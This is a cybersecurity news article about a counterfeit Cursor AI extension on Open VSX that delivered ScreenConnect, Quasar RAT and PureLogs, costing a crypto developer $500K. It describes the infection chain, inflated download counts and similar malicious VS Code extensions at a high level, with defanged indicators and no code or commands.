Crypto Dev Loses $500K to Fake Cursor AI Extension: A New Supply Chain Threat
A counterfeit extension for the Cursor AI development environment, masquerading as a legitimate Ethereum utility, has resulted in a major cybersecurity incident—a Russian cryptocurrency developer lost half a million dollars due to the extension’s malicious behavior. Disguised under the name “Solidity Language,” the extension was hosted on the Open VSX registry and designed solely to enable remote access and exfiltrate sensitive data, including cryptocurrency wallets.
Cursor AI IDE, built atop Visual Studio Code, supports extensions via the alternative Open VSX marketplace. This flexibility became a vulnerability: threat actors uploaded a fraudulent extension that mimicked a popular syntax-highlighting tool for Solidity. In reality, the package contained a JavaScript file named extension.js that launched a remote PowerShell script from the domain angelic[.]su.
The PowerShell script checked for the presence of ScreenConnect—a remote access tool—and, if not installed, added it to the system. Through ScreenConnect, the attackers gained full control over the victim’s machine, enabling them to deploy additional malicious scripts. The final payload in the chain was a loader called VMDetector, retrieved from archive[.]org, which installed two strains of malware: Quasar RAT and PureLogs.
Quasar RAT enabled remote command execution, while PureLogs specialized in data theft, targeting everything from saved passwords and session cookies to the contents of cryptocurrency wallets. According to Kaspersky Lab, these tools were directly responsible for the breach of the victim’s system.
Before its removal on July 2, the malicious extension had been downloaded approximately 54,000 times. However, security experts believe this number was artificially inflated to simulate popularity and build trust. The very next day, a nearly identical variant named “solidity” emerged and rapidly accumulated close to two million downloads. This surge in fake popularity allowed the fraudulent extension to surpass the legitimate one in Open VSX search results, thereby endangering tens of thousands of users.
Similar activity was observed on Visual Studio Code’s official marketplace, where malicious extensions with names like “solaibot,” “among-eth,” and “blankebesxstnion” were discovered. These followed the same attack pattern: install ScreenConnect, execute malicious scripts, and deploy info-stealing malware.
Experts warn that cybercriminals are skillfully exploiting trust in open-source software and ranking algorithms on distribution platforms. Developers often rely on public repositories, unaware that they may be seeded with threats. Kaspersky Lab emphasizes the importance of code review before installation—especially when an extension behaves suspiciously. Transparency and access to source code are strengths of the open-source model, but they also become liabilities when user vigilance falters.
